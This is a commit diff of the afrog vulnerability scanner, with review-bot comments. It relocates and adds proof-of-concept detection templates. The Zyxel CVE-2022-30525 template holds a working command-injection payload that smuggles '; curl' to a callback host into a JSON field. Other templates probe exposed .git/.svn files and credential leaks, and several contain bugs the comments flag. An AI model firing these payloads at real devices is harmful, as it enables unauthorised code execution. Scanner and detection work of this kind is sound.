Projects STRLCPY afrog Commits 959cd336
  • afrog-pocs/CVE/2022/CVE-2022-30525.yaml
    1  -id: CVE-2022-30525
    2  - 
    3  -info:
    4  - name: Zyxel Firewall - OS Command Injection
    5  - author: h1ei1,prajiteshsingh
    6  - severity: critical
    7  - description: |
    8  - An OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, are susceptible to a command injection vulnerability which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device.
    9  - reference:
    10  - - https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/
    11  - - https://github.com/rapid7/metasploit-framework/pull/16563
    12  - - https://www.zyxel.com/support/Zyxel-security-advisory-for-OS-command-injection-vulnerability-of-firewalls.shtml
    13  - - https://nvd.nist.gov/vuln/detail/CVE-2022-30525
    14  - - http://wiki.peiqi.tech/wiki/iot/Zyxel/Zyxel%20USG%20FLEX%20handler%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20CVE-2022-30525.html
    15  - 
    16  -set:
    17  - reverse: newReverse()
    18  - reverseURL: reverse.url
    19  -rules:
    20  - r0:
    21  - request:
    22  - method: POST
    23  - path: /ztp/cgi-bin/handler
    24  - headers:
    25  - Content-Type: application/json
    26  - body: |
    27  - {"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; curl {{reverseURL}};","data":"hi"}
    28  - expression: response.status == 500 && reverse.wait(5)
    29  -expression: r0()
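Review bot: this whole-file deletion carries the same content (author `h1ei1,prajiteshsingh`, the NVD-style description, the `body: |` literal and the `response.status == 500 && reverse.wait(5)` expression) that the last hunk of this commit writes into pocs/afrog-pocs/g-CVE/2022/CVE-2022-30525.yaml. Every other template in the commit is recorded as a rename ("Content is identical"); recording this one as a rename too, with the edits applied at the new path, would keep the file's history in one place instead of a delete plus an unrelated-looking modify.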
  • afrog-pocs/fingerprint/phpmyadmin-panel.yaml
    1  -id: phpmyadmin-panel
    2  - 
    3  -info:
    4  - name: phpMyAdmin Panel
    5  - author: pdteam
    6  - severity: info
    7  - 
    8  -rules:
    9  - r0:
    10  - request:
    11  - method: GET
    12  - path: /phpmyadmin/
    13  - expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
    14  - r1:
    15  - request:
    16  - method: GET
    17  - path: /phpMyAdmin/
    18  - expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
    19  - r2:
    20  - request:
    21  - method: GET
    22  - path: /xampp/phpmyadmin/
    23  - expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
    24  - r3:
    25  - request:
    26  - method: GET
    27  - path: /web/phpmyadmin/
    28  - expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
    29  - r4:
    30  - request:
    31  - method: GET
    32  - path: /typo3/phpmyadmin/
    33  - expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
    34  - r5:
    35  - request:
    36  - method: GET
    37  - path: /forum/phpmyadmin/
    38  - expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
    39  - r6:
    40  - request:
    41  - method: GET
    42  - path: /php/phpmyadmin/
    43  - expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
    44  - r7:
    45  - request:
    46  - method: GET
    47  - path: /phpmyadmin/
    48  - expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
    49  - r8:
    50  - request:
    51  - method: GET
    52  - path: /blog/phpmyadmin/
    53  - expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body
    54  - r9:
    55  - request:
    56  - method: GET
    57  - path: /apache-default/phpmyadmin/
    58  - expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
    59  - r10:
    60  - request:
    61  - method: GET
    62  - path: /administrator/components/com_joommyadmin/phpmyadmin/
    63  - expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
    64  - r11:
    65  - request:
    66  - method: GET
    67  - path: /_phpmyadmin/
    68  - expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
    69  - r12:
    70  - request:
    71  - method: GET
    72  - path: /admin//phpmyadmin/
    73  - expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
    74  -expression: r0() || r1() || r2() || r3() || r4() || r5() || r6() || r7() || r8() || r9() | r10() || r11() || r12()
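Review bot: the deleted template is reproduced almost verbatim in pocs/afrog-pocs/a-fingerprinting/phpmyadmin-panel.yaml later in this commit, the only difference being r12's path (`/admin//phpmyadmin/` becomes `/admin/phpmyadmin/`); as with the CVE-2022-30525 template, a rename followed by the one-line path fix would preserve history. The defects in this copy (the unbalanced `bmatches(response.body` in r8 and the single `|` between `r9()` and `r10()` in the final expression) are not fixed by the move and still need a follow-up.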
  • cmd/rules/main.go
    skipped 7 lines
    8 8  )
    9 9   
    10 10  func main() {
    11  - c := catalog.New("./afrog-pocs")
    12  - allPocsYamlSlice, err := c.GetPocPath("./afrog-pocs")
     11 + c := catalog.New("./pocs/afrog-pocs")
     12 + allPocsYamlSlice, err := c.GetPocPath("./pocs/afrog-pocs")
    13 13   if err != nil && len(allPocsYamlSlice) == 0 {
    14 14   fmt.Println("未找到可执行脚本(POC),请检查`默认脚本`或指定新の脚本(POC)")
    15 15   }
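Review bot: the error branch in the unchanged context directly below the edited lines only prints the message and falls through, so when `GetPocPath` fails with an empty result `main` keeps running with an empty `allPocsYamlSlice`; add a `return` (or `os.Exit(1)`) inside that `if`. The condition `err != nil && len(allPocsYamlSlice) == 0` also swallows any error that arrives together with a partial slice; report `err` whenever it is non-nil. Passing `"./pocs/afrog-pocs"` twice, once to `catalog.New` and again to `GetPocPath`, invites the two literals to drift apart on the next move; a single named constant would avoid a repeat of exactly this edit.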
    skipped 11 lines
  • internal/runner/banner.go
    skipped 8 lines
    9 9  )
    10 10   
    11 11  func ShowBanner() string {
    12  - return log.LogColor.Bold("afrog ") + log.LogColor.Banner(".")
     12 + return log.LogColor.Bold("afrog ") + log.LogColor.Banner("")
    13 13  }
    14 14   
    15 15  func ShowUsage() string {
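Review bot: `log.LogColor.Banner("")` now receives an empty string, so the call contributes nothing to the returned value; either drop the concatenation and return `log.LogColor.Bold("afrog ")` alone, or pass the text the banner is meant to display. Leaving a no-op call in place reads like an unfinished edit.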
    skipped 17 lines
  • afrog-pocs/fingerprint/appex-lotwan-login-panel.yaml pocs/afrog-pocs/a-fingerprinting/appex-lotwan-login-panel.yaml
    Content is identical
  • pocs/afrog-pocs/a-fingerprinting/phpmyadmin-panel.yaml
    skipped 9 lines
    10 10   request:
    11 11   method: GET
    12 12   path: /phpmyadmin/
    13  - expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && "v=([a-z0-9-._]+)".bmatches(response.body)
    14  -expression: r0()
     13 + expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
     14 + r1:
     15 + request:
     16 + method: GET
     17 + path: /phpMyAdmin/
     18 + expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
     19 + r2:
     20 + request:
     21 + method: GET
     22 + path: /xampp/phpmyadmin/
     23 + expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
     24 + r3:
     25 + request:
     26 + method: GET
     27 + path: /web/phpmyadmin/
     28 + expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
     29 + r4:
     30 + request:
     31 + method: GET
     32 + path: /typo3/phpmyadmin/
     33 + expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
     34 + r5:
     35 + request:
     36 + method: GET
     37 + path: /forum/phpmyadmin/
     38 + expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
     39 + r6:
     40 + request:
     41 + method: GET
     42 + path: /php/phpmyadmin/
     43 + expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
     44 + r7:
     45 + request:
     46 + method: GET
     47 + path: /phpmyadmin/
     48 + expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
     49 + r8:
     50 + request:
     51 + method: GET
     52 + path: /blog/phpmyadmin/
     53 + expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body
     54 + r9:
     55 + request:
     56 + method: GET
     57 + path: /apache-default/phpmyadmin/
     58 + expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
     59 + r10:
     60 + request:
     61 + method: GET
     62 + path: /administrator/components/com_joommyadmin/phpmyadmin/
     63 + expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
     64 + r11:
     65 + request:
     66 + method: GET
     67 + path: /_phpmyadmin/
     68 + expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
     69 + r12:
     70 + request:
     71 + method: GET
     72 + path: /admin/phpmyadmin/
     73 + expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
     74 +expression: r0() || r1() || r2() || r3() || r4() || r5() || r6() || r7() || r8() || r9() | r10() || r11() || r12()
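Review bot: the r8 expression (`path: /blog/phpmyadmin/`) is missing the closing parenthesis after `bmatches(response.body`, and the top-level expression joins `r9()` and `r10()` with a single `|` instead of `||`; both are carried over from the deleted copy and will stop the template from evaluating as intended. r0 and r7 both request `/phpmyadmin/`, so r7 is a duplicate probe and can be dropped (and the later rules renumbered). Beyond that, the change from `"v=([a-z0-9-._]+)"` to the single-quoted form in r0 and the `/admin//phpmyadmin/` to `/admin/phpmyadmin/` fix in r12 look right.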
  • afrog-pocs/disclosure/hue-login-panel.yaml pocs/afrog-pocs/b-disclosure/hue-login-panel.yaml
    Content is identical
  • afrog-pocs/vulnerability/acti-video-read-file.yaml pocs/afrog-pocs/e-vulnerability/acti-video-read-file.yaml
    Content is identical
  • afrog-pocs/vulnerability/alibaba-canal-config-leak.yaml pocs/afrog-pocs/e-vulnerability/alibaba-canal-config-leak.yaml
    Content is identical
  • afrog-pocs/vulnerability/bohuangwanglong-cmd-php-rce.yaml pocs/afrog-pocs/e-vulnerability/bohuangwanglong-cmd-php-rce.yaml
    Content is identical
  • afrog-pocs/vulnerability/bohuawanglong-users-xml-password-leak.yaml pocs/afrog-pocs/e-vulnerability/bohuawanglong-users-xml-password-leak.yaml
    Content is identical
  • afrog-pocs/vulnerability/byzoro-smart-importhtml-rce.yaml pocs/afrog-pocs/e-vulnerability/byzoro-smart-importhtml-rce.yaml
    Content is identical
  • afrog-pocs/vulnerability/clickhouse-api-unauth.yaml pocs/afrog-pocs/e-vulnerability/clickhouse-api-unauth.yaml
    Content is identical
  • afrog-pocs/vulnerability/docker-remote-api-unauth.yaml pocs/afrog-pocs/e-vulnerability/docker-remote-api-unauth.yaml
    Content is identical
  • afrog-pocs/vulnerability/e-office-v10-sql-inject.yaml pocs/afrog-pocs/e-vulnerability/e-office-v10-sql-inject.yaml
    Content is identical
  • afrog-pocs/vulnerability/eyou-mail-moni-detail-rce.yaml pocs/afrog-pocs/e-vulnerability/eyou-mail-moni-detail-rce.yaml
    Content is identical
  • afrog-pocs/vulnerability/feiyuxing-info-leak.yaml pocs/afrog-pocs/e-vulnerability/feiyuxing-info-leak.yaml
    Content is identical
  • afrog-pocs/vulnerability/flix-ax8-download-read-file.yaml pocs/afrog-pocs/e-vulnerability/flix-ax8-download-read-file.yaml
    Content is identical
  • pocs/afrog-pocs/e-vulnerability/git-leak.yaml
     1 +id: git-leak
     2 + 
     3 +info:
     4 + name: Git 代码托管泄漏
     5 + author: zan8in
     6 + severity: critical
     7 + 
     8 +rules:
     9 + r0:
     10 + request:
     11 + method: GET
     12 + path: /.git/config
     13 + expression: response.status == 200 && response.body.bcontains(b'[core]') && response.body.bcontains(b'repositoryformatversion') && response.body.bcontains(b'[branch')
     14 + r1:
     15 + request:
     16 + method: GET
     17 + path: /.git/index
     18 + expression: response.status == 200 && response.body.bcontains(b'BIRC') && response.body.bcontains(b'repositoryformatversion') && response.body.bcontains(b'[branch')
     19 +
     20 + r2:
     21 + request:
     22 + method: GET
     23 + path: /.git/HEAD
     24 + expression: response.status == 200 && response.body.bcontains(b'refs/heads') && response.body.bcontains(b'repositoryformatversion') && response.body.bcontains(b'[branch')
     25 +expression: r0() || r1() || r2()
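Review bot: r1 and r2 can never fire as written, because they reuse r0's `repositoryformatversion` and `[branch` checks, which are `.git/config` contents, not something found in `.git/index` (a binary file whose four-byte signature is `DIRC`, not `BIRC`) or in `.git/HEAD` (a single `ref: refs/heads/...` line). Reduce r1 to `response.status == 200 && response.body.bcontains(b'DIRC')` and r2 to the `refs/heads` check alone, and remove the stray empty `+` line between r1 and r2 inside `rules`. Since r0 already establishes exposure on its own, the combined `r0() || r1() || r2()` only gains value once the other two rules can actually match.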
  • afrog-pocs/vulnerability/h3c-mpsec-isg1000-file-read.yaml pocs/afrog-pocs/e-vulnerability/h3c-mpsec-isg1000-file-read.yaml
    Content is identical
  • afrog-pocs/vulnerability/haofeng-firewall-setdomain-unauth.yaml pocs/afrog-pocs/e-vulnerability/haofeng-firewall-setdomain-unauth.yaml
    Content is identical
  • afrog-pocs/vulnerability/hikvision-gateway-data-file-read.yaml pocs/afrog-pocs/e-vulnerability/hikvision-gateway-data-file-read.yaml
    Content is identical
  • afrog-pocs/vulnerability/hikvision-showfile-file-read.yaml pocs/afrog-pocs/e-vulnerability/hikvision-showfile-file-read.yaml
    Content is identical
  • afrog-pocs/vulnerability/huiwen-book-config-properties-info-leak.yaml pocs/afrog-pocs/e-vulnerability/huiwen-book-config-properties-info-leak.yaml
    Content is identical
  • afrog-pocs/vulnerability/ikuai-login-panel.yaml pocs/afrog-pocs/e-vulnerability/ikuai-login-panel.yaml
    Content is identical
  • afrog-pocs/vulnerability/kedacom-gateway-file-read.yaml pocs/afrog-pocs/e-vulnerability/kedacom-gateway-file-read.yaml
    Content is identical
  • afrog-pocs/vulnerability/kedacom-mts-file-read.yaml pocs/afrog-pocs/e-vulnerability/kedacom-mts-file-read.yaml
    Content is identical
  • afrog-pocs/vulnerability/kingsoft-v8-get-file-content-file-read.yaml pocs/afrog-pocs/e-vulnerability/kingsoft-v8-get-file-content-file-read.yaml
    Content is identical
  • afrog-pocs/vulnerability/kyan-network-license-php-rce.yaml pocs/afrog-pocs/e-vulnerability/kyan-network-license-php-rce.yaml
    Content is identical
  • afrog-pocs/vulnerability/kyan-network-module-php-rce.yaml pocs/afrog-pocs/e-vulnerability/kyan-network-module-php-rce.yaml
    Content is identical
  • afrog-pocs/vulnerability/kyan-network-time-php-rce.yaml pocs/afrog-pocs/e-vulnerability/kyan-network-time-php-rce.yaml
    Content is identical
  • afrog-pocs/vulnerability/magicflow-main-xp-file-read.yaml pocs/afrog-pocs/e-vulnerability/magicflow-main-xp-file-read.yaml
    Content is identical
  • afrog-pocs/vulnerability/msa-gateway-read-file.yaml pocs/afrog-pocs/e-vulnerability/msa-gateway-read-file.yaml
    Content is identical
  • afrog-pocs/vulnerability/netmizer-log-management-cmd-php-rce.yaml pocs/afrog-pocs/e-vulnerability/netmizer-log-management-cmd-php-rce.yaml
    Content is identical
  • afrog-pocs/vulnerability/netmizer-log-management-data-directory-traversal.yaml pocs/afrog-pocs/e-vulnerability/netmizer-log-management-data-directory-traversal.yaml
    Content is identical
  • afrog-pocs/vulnerability/netpower-download-php-file-read.yaml pocs/afrog-pocs/e-vulnerability/netpower-download-php-file-read.yaml
    Content is identical
  • afrog-pocs/vulnerability/php-zerodium-backdoor.yaml pocs/afrog-pocs/e-vulnerability/php-zerodium-backdoor.yaml
    Content is identical
  • afrog-pocs/vulnerability/phpmyadmin-misconfiguration.yaml pocs/afrog-pocs/e-vulnerability/phpmyadmin-misconfiguration.yaml
    Content is identical
  • afrog-pocs/vulnerability/phpmyadmin-server-import.yaml pocs/afrog-pocs/e-vulnerability/phpmyadmin-server-import.yaml
    Content is identical
  • afrog-pocs/vulnerability/phpmyadmin-setup.yaml pocs/afrog-pocs/e-vulnerability/phpmyadmin-setup.yaml
    Content is identical
  • afrog-pocs/vulnerability/sapido-router-rce.yaml pocs/afrog-pocs/e-vulnerability/sapido-router-rce.yaml
    Content is identical
  • afrog-pocs/vulnerability/selea-targa-camera-read-file.yaml pocs/afrog-pocs/e-vulnerability/selea-targa-camera-read-file.yaml
    Content is identical
  • pocs/afrog-pocs/e-vulnerability/svn-leak.yaml
     1 +id: svn-leak
     2 + 
     3 +info:
     4 + name: SVM 代码托管泄漏
     5 + author: zan8in
     6 + severity: critical
     7 + 
     8 +rules:
     9 + r0:
     10 + request:
     11 + method: GET
     12 + path: /.svn/entries
     13 + expression: response.status == 200 && response.body.bcontains(b'-props') && response.body.bcontains(b'svn://')
     14 +expression: r0()
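Review bot: `name: SVM 代码托管泄漏` should read `SVN`, matching the id and the file name. The expression also requires the literal `svn://`, so an exposed `.svn/entries` from a working copy that was checked out over `http://` or `https://` would not be reported even though the `-props` marker matched; matching on the `-props` marker together with a scheme-agnostic URL pattern (for example `'[a-z]+://'.bmatches(response.body)`) would widen detection without loosening it.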
  • afrog-pocs/vulnerability/tenda-w15e-routercfm-cfg-config-leak.yaml pocs/afrog-pocs/e-vulnerability/tenda-w15e-routercfm-cfg-config-leak.yaml
    Content is identical
  • afrog-pocs/vulnerability/wholeton-vpn-info-leak.yaml pocs/afrog-pocs/e-vulnerability/wholeton-vpn-info-leak.yaml
    Content is identical
  • afrog-pocs/vulnerability/wisegiga-nas-down-data-php-file-read.yaml pocs/afrog-pocs/e-vulnerability/wisegiga-nas-down-data-php-file-read.yaml
    Content is identical
  • afrog-pocs/vulnerability/wisegiga-nas-group-php-rce.yaml pocs/afrog-pocs/e-vulnerability/wisegiga-nas-group-php-rce.yaml
    Content is identical
  • afrog-pocs/CNVD/2020/CNVD-2020-62853.yaml pocs/afrog-pocs/f-CNVD/2020/CNVD-2020-62853.yaml
    Content is identical
  • afrog-pocs/CNVD/2020/CNVD-2020-73282.yaml pocs/afrog-pocs/f-CNVD/2020/CNVD-2020-73282.yaml
    Content is identical
  • afrog-pocs/CNVD/2021/CNVD-2021-32799.yaml pocs/afrog-pocs/f-CNVD/2021/CNVD-2021-32799.yaml
    Content is identical
  • afrog-pocs/CNVD/2021/CNVD-2021-39067.yaml pocs/afrog-pocs/f-CNVD/2021/CNVD-2021-39067.yaml
    Content is identical
  • afrog-pocs/CVE/2007/CVE-2007-4556.yaml pocs/afrog-pocs/g-CVE/2007/CVE-2007-4556.yaml
    Content is identical
  • afrog-pocs/CVE/2012/CVE-2012-0392.yaml pocs/afrog-pocs/g-CVE/2012/CVE-2012-0392.yaml
    Content is identical
  • afrog-pocs/CVE/2013/CVE-2013-1965.yaml pocs/afrog-pocs/g-CVE/2013/CVE-2013-1965.yaml
    Content is identical
  • afrog-pocs/CVE/2017/CVE-2017-12611.yaml pocs/afrog-pocs/g-CVE/2017/CVE-2017-12611.yaml
    Content is identical
  • afrog-pocs/CVE/2017/CVE-2017-16894.yaml pocs/afrog-pocs/g-CVE/2017/CVE-2017-16894.yaml
    Content is identical
  • afrog-pocs/CVE/2017/CVE-2017-5638.yaml pocs/afrog-pocs/g-CVE/2017/CVE-2017-5638.yaml
    Content is identical
  • afrog-pocs/CVE/2017/CVE-2017-8229.yaml pocs/afrog-pocs/g-CVE/2017/CVE-2017-8229.yaml
    Content is identical
  • afrog-pocs/CVE/2018/CVE-2018-11776.yaml pocs/afrog-pocs/g-CVE/2018/CVE-2018-11776.yaml
    Content is identical
  • afrog-pocs/CVE/2018/CVE-2018-1273.yaml pocs/afrog-pocs/g-CVE/2018/CVE-2018-1273.yaml
    Content is identical
  • afrog-pocs/CVE/2018/CVE-2018-8715.yaml pocs/afrog-pocs/g-CVE/2018/CVE-2018-8715.yaml
    Content is identical
  • afrog-pocs/CVE/2019/CVE-2019-0230.yaml pocs/afrog-pocs/g-CVE/2019/CVE-2019-0230.yaml
    Content is identical
  • afrog-pocs/CVE/2019/CVE-2019-5418.yaml pocs/afrog-pocs/g-CVE/2019/CVE-2019-5418.yaml
    Content is identical
  • afrog-pocs/CVE/2020/CVE-2020-11738.yaml pocs/afrog-pocs/g-CVE/2020/CVE-2020-11738.yaml
    Content is identical
  • afrog-pocs/CVE/2020/CVE-2020-11991.yaml pocs/afrog-pocs/g-CVE/2020/CVE-2020-11991.yaml
    Content is identical
  • afrog-pocs/CVE/2020/CVE-2020-17530.yaml pocs/afrog-pocs/g-CVE/2020/CVE-2020-17530.yaml
    Content is identical
  • afrog-pocs/CVE/2021/CVE-2021-1497.yaml pocs/afrog-pocs/g-CVE/2021/CVE-2021-1497.yaml
    Content is identical
  • afrog-pocs/CVE/2021/CVE-2021-1499.yaml pocs/afrog-pocs/g-CVE/2021/CVE-2021-1499.yaml
    Content is identical
  • afrog-pocs/CVE/2021/CVE-2021-22145.yaml pocs/afrog-pocs/g-CVE/2021/CVE-2021-22145.yaml
    Content is identical
  • afrog-pocs/CVE/2021/CVE-2021-30461.yaml pocs/afrog-pocs/g-CVE/2021/CVE-2021-30461.yaml
    Content is identical
  • afrog-pocs/CVE/2021/CVE-2021-3297.yaml pocs/afrog-pocs/g-CVE/2021/CVE-2021-3297.yaml
    Content is identical
  • afrog-pocs/CVE/2021/CVE-2021-41381.yaml pocs/afrog-pocs/g-CVE/2021/CVE-2021-41381.yaml
    Content is identical
  • afrog-pocs/CVE/2021/CVE-2021-42013.yaml pocs/afrog-pocs/g-CVE/2021/CVE-2021-42013.yaml
    Content is identical
  • afrog-pocs/CVE/2022/CVE-2022-22965.yaml pocs/afrog-pocs/g-CVE/2022/CVE-2022-22965.yaml
    Content is identical
  • pocs/afrog-pocs/g-CVE/2022/CVE-2022-23944.yaml
     1 +id: CVE-2022-23944
     2 + 
     3 +info:
     4 + name: Apache ShenYu Admin Unauth Access
     5 + author: cckuakilong
     6 + severity: critical
     7 + description: Apache ShenYu suffers from an unauthorized access vulnerability where a user can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1.
     8 + reference:
     9 + - https://github.com/apache/incubator-shenyu/pull/2462
     10 + - https://nvd.nist.gov/vuln/detail/CVE-2022-23944
     11 + - https://github.com/cckuailong/reapoc/blob/main/2022/CVE-2022-23944/vultarget/README.md
     12 + - https://lists.apache.org/thread/dbrjnnlrf80dr0f92k5r2ysfvf1kr67y
     13 + 
     14 +rules:
     15 + r0:
     16 + request:
     17 + method: GET
     18 + path: /plugin
     19 + expression: response.status == 200 && response.body.bcontains(b'"message":"query success"') && response.body.bcontains(b'"code":200')
     20 +expression: r0()
  • pocs/afrog-pocs/g-CVE/2022/CVE-2022-26148.yaml
     1 +id: CVE-2022-26148
     2 + 
     3 +info:
     4 + name: Grafana & Zabbix Integration - Credentials Disclosure
     5 + author: Geekby
     6 + severity: critical
     7 + description: |
     8 + Grafana through 7.3.4, when integrated with Zabbix, contains a credential disclosure vulnerability. The Zabbix password can be found in the api_jsonrpc.php HTML source code. When the user logs in and allows the user to register, one can right click to view the source code and use Ctrl-F to search for password in api_jsonrpc.php to discover the Zabbix account password and URL address.
     9 + reference:
     10 + - https://2k8.org/post-319.html
     11 + - https://security.netapp.com/advisory/ntap-20220425-0005/
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2022-26148
     13 + 
     14 +rules:
     15 + r0:
     16 + request:
     17 + method: GET
     18 + path: /login?redirect=%2F
     19 + expression: response.status == 200 && (response.body.bcontains(b'"zabbix":') || response.body.bcontains(b'"zbx":') || response.body.bcontains(b'alexanderzobnin-zabbix-datasource')) && '"password":"(.*?)"'.bmatches(response.body) && '"username":"(.*?)"'.bmatches(response.body)
     20 +expression: r0()
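Review bot: `'"password":"(.*?)"'.bmatches(response.body)` also matches an empty value (`"password":""`), so a login page that embeds a Zabbix datasource block with a blank password would be reported as a critical credential disclosure; `'"password":"[^"]+"'` limits the match to a non-empty value, and the same applies to the `"username"` pattern. The description talks about `api_jsonrpc.php` while the rule fetches `/login?redirect=%2F`; a sentence in the description explaining why the login page is the location checked would save the next reader from assuming the path is wrong.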
  • pocs/afrog-pocs/g-CVE/2022/CVE-2022-30525.yaml
    skipped 1 lines
    2 2   
    3 3  info:
    4 4   name: Zyxel Firewall - OS Command Injection
    5  - author: zan8in
     5 + author: h1ei1,prajiteshsingh
    6 6   severity: critical
    7 7   description: |
    8  - Rapid7 发现并报告了一个漏洞,该漏洞影响支持零接触配置 (ZTP) 的 Zyxel 防火墙,其中包括 ATP 系列、VPN 系列和 USG FLEX 系列(包括 USG20-VPN 和 USG20W-VPN)。该漏洞标识为 CVE-2022-30525,允许未经身份验证的远程攻击者以nobody受影响设备上的用户身份执行任意代码。
    9  - title="USG FLEX"
     8 + An OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, are susceptible to a command injection vulnerability which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device.
    10 9   reference:
     10 + - https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/
     11 + - https://github.com/rapid7/metasploit-framework/pull/16563
     12 + - https://www.zyxel.com/support/Zyxel-security-advisory-for-OS-command-injection-vulnerability-of-firewalls.shtml
     13 + - https://nvd.nist.gov/vuln/detail/CVE-2022-30525
    11 14   - http://wiki.peiqi.tech/wiki/iot/Zyxel/Zyxel%20USG%20FLEX%20handler%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20CVE-2022-30525.html
    12 15   
    13 16  set:
    skipped 6 lines
    20 23   path: /ztp/cgi-bin/handler
    21 24   headers:
    22 25   Content-Type: application/json
    23  - body: "{\"command\":\"setWanPortSt\",\"proto\":\"dhcp\",\"port\":\"4\",\"vlan_tagged\":\"1\",\"vlanid\":\"5\",\"mtu\":\"; curl {{reverseURL}};\",\"data\":\"hi\"}"
    24  - expression: reverse.wait(5)
     26 + body: |
     27 + {"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; curl {{reverseURL}};","data":"hi"}
     28 + expression: response.status == 500 && reverse.wait(5)
    25 29  expression: r0()
    26  - 
